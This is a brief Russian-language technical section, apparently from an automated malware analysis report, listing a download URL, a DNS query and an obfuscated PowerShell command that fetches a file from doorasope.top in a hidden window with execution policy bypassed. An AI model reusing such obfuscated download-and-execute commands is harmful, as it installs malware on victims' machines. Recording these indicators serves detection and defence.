Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^werShELL^.EXe -E^Xecuti^ON^p^oLicY bypas^s^ -nOpRoFI^lE^ ^-^WIND^OWstYLE ^HId^D^e^n (NEw^-o^bjEc^t ^sySt^e^m^.nEt^.^wEb^Cli^EnT)^.dow^NLOaD^File('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^o^werShELL^.EXe -E^Xecuti^ON^p^oLicY bypas^s^ -nOpRoFI^lE^ ^-^WIND^OWstYLE ^HId^D^e^n (NEw^-o^bjEc^t ^sySt^e^m^.nEt^.^wEb^Cli^EnT)^.dow^NLOaD^File('http://www.doorasope.top...' (со скрытым окном)